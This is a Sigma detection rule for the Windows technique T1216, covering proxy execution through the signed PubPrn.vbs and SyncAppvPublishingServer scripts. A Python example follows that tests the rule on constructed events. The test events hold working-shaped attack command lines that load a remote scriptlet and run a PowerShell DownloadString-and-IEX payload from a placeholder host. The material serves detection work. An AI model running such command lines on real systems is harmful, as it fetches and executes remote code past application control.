title: System Script Proxy Execution (T1216)
id: df00tech-t1216
status: experimental
description: "Adversaries may use trusted scripts, often signed with Microsoft certificates, to proxy the execution of malicious files. Several Microsoft-signed scripts that ship with Windows or are downloadable from Microsoft can be abused to proxy execution of attacker-controlled content. The primary sub-techniques are PubPrn.vbs (a printer publishing script under Printing_Admin_Scripts whose second argument, normally a print server or LDAP path, is resolved as an object moniker and therefore accepts a 'script:' COM scriptlet URL) and SyncAppvPublishingServer.vbs/.exe (an App-V publishing script that builds a PowerShell command from its arguments, so a ';' in the argument terminates the intended cmdlet and the remainder runs as arbitrary PowerShell). Because the scripts are Microsoft-signed and run under the Windows script hosts (cscript.exe/wscript.exe) or a signed binary, they may pass application control policies (AppLocker, WDAC) that allow Microsoft-signed content, and they evade detections that focus on unsigned or unfamiliar interpreters. MITRE classifies the technique under Defense Evasion; in practice it appears as the launcher stage of initial access payloads and post-exploitation tooling rather than as the payload itself."
references:
  - https://attack.mitre.org/techniques/T1216/
  - https://df00tech.com/detections/T1216
author: df00tech
date: 2026/04/13
tags:
  - attack.defense-evasion
  - attack.t1216
  - attack.t1216.001
  - attack.t1216.002
# NOTE: logsource is auto-derived and may need adjustment for your environment
logsource:
  category: process_creation
  product: windows
detection:
  # Minimal process_creation selection for both sub-techniques; the fuller KQL/SPL query is on df00tech.
  selection_pubprn:
    CommandLine|contains|all: ['pubprn.vbs', 'script:']
  selection_appv:
    CommandLine|contains|all: ['SyncAppvPublishingServer', ';']
  condition: 1 of selection_*
falsepositives:
  - "Legitimate printer publishing with PubPrn.vbs in enterprise printing environments; print administrators point it at a known print server and directory path, not at a 'script:' URL"
  - "App-V publishing infrastructure running SyncAppvPublishingServer.vbs/.exe as part of a scheduled publishing refresh; verify the server and account are expected in your App-V deployment"
  - "Authorized penetration tests or red team exercises that deliberately run LOLBAS scripts; correlate with change management tickets"
  - "Software packaging scripts that invoke cscript.exe against Microsoft-signed VBScripts during application installation; check whether the parent process is a trusted installer"
level: high

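Added example, not part of the df00tech rule or of any Microsoft code: the same two-substring selection the rule uses, implemented in Python and run over constructed Windows process-creation records, with the analyst checks from the false-positive notes applied to each hit. The events, hostnames (`*.example.invalid`, `printsrv01`) and paths are constructed for illustration; the regexes for escalation indicators are an assumption about what a triage step would look for, not part of the rule.

```python
"""Added example (not part of the df00tech rule): the T1216 process-creation
selection in Python, run over constructed Windows process-creation records, with the
triage checks from the false-positive notes applied to each hit."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Minimal process-creation record (Sysmon EventID 1 / Security 4688 shape)."""
    image: str
    command_line: str
    parent_image: str


# Same substring logic as the Sigma selection: every needle must appear in CommandLine.
# Sigma string matching is case-insensitive, so compare on lower-cased text.
SELECTIONS = {
    "pubprn_script_url": ("pubprn.vbs", "script:"),
    "syncappv_powershell_pipeline": ("syncappvpublishingserver", ";"),
}

# Escalation indicators (assumption, not part of the rule): a remote COM scriptlet in
# PubPrn's second argument, or an in-line PowerShell download/eval in the text that
# SyncAppvPublishingServer hands to PowerShell after the ';'.
REMOTE_SCRIPTLET = re.compile(r"script:\s*https?://", re.I)
PS_DOWNLOAD_EVAL = re.compile(r"DownloadString|Invoke-Expression|\bIEX\b|Net\.WebClient", re.I)

# Constructed sample events; hosts, paths and URLs are illustrative only.
SAMPLE_EVENTS = [
    # Malicious shape: PubPrn.vbs pointed at a remote scriptlet via the script: moniker.
    ProcEvent(r"C:\Windows\System32\cscript.exe",
              r"cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs "
              r"127.0.0.1 script:https://cdn.example.invalid/f.sct",
              r"C:\Windows\System32\cmd.exe"),
    # Benign shape: a print admin publishing printers from a print server to a directory path.
    ProcEvent(r"C:\Windows\System32\cscript.exe",
              'cscript.exe pubprn.vbs printsrv01 "LDAP://CN=Printers,DC=corp,DC=example"',
              r"C:\Windows\System32\cmd.exe"),
    # Malicious shape: a PowerShell expression smuggled after ';' into the App-V script's pipeline.
    ProcEvent(r"C:\Windows\System32\wscript.exe",
              '''wscript.exe SyncAppvPublishingServer.vbs "n;((New-Object Net.WebClient)'''
              '''.DownloadString('http://cdn.example.invalid/s.ps1') | IEX"''',
              r"C:\Windows\System32\cmd.exe"),
    # No match: a different Microsoft-signed printing script launched by an installer.
    ProcEvent(r"C:\Windows\System32\cscript.exe",
              "cscript.exe prnmngr.vbs -l",
              r"C:\Windows\System32\msiexec.exe"),
]


def match_selection(ev: ProcEvent) -> list:
    """Return the names of the selections whose needles all occur in the command line."""
    cl = ev.command_line.lower()
    return [name for name, needles in SELECTIONS.items() if all(n in cl for n in needles)]


def triage(ev: ProcEvent, hits: list) -> dict:
    """Turn a selection hit into a finding carrying the analyst checks from the FP notes."""
    reasons = []
    if "pubprn_script_url" in hits and REMOTE_SCRIPTLET.search(ev.command_line):
        reasons.append("PubPrn second argument is a remote script: URL, not a print server/LDAP path")
    if "syncappv_powershell_pipeline" in hits and PS_DOWNLOAD_EVAL.search(ev.command_line):
        reasons.append("App-V argument carries a PowerShell download/eval after ';'")
    parent = ev.parent_image.rsplit("\\", 1)[-1]
    return {
        "rules": hits,
        # A hit with a concrete download/eval indicator is high; anything else still needs
        # a human check against printing/App-V change records and the parent process.
        "severity": "high" if reasons else "review",
        "reasons": reasons,
        "parent": parent,
        "command_line": ev.command_line,
    }


def analyze(events) -> list:
    """Run the selection over a batch of events and triage every hit."""
    return [triage(ev, hits) for ev in events if (hits := match_selection(ev))]


if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(finding["severity"].upper(), finding["rules"], "parent:", finding["parent"])
        for reason in finding["reasons"]:
            print("   -", reason)
```

Run as-is it reports two findings, both high: the PubPrn record because its second argument is an `https://` scriptlet rather than a server or LDAP path, and the App-V record because the text after `;` contains `DownloadString` and `IEX`. The benign PubPrn publish and the unrelated printing script produce no hit, which is the distinction the false-positive notes ask an analyst to make. The `parent` field is carried through so the installer-parent check from the last false-positive note can be applied without going back to the raw event.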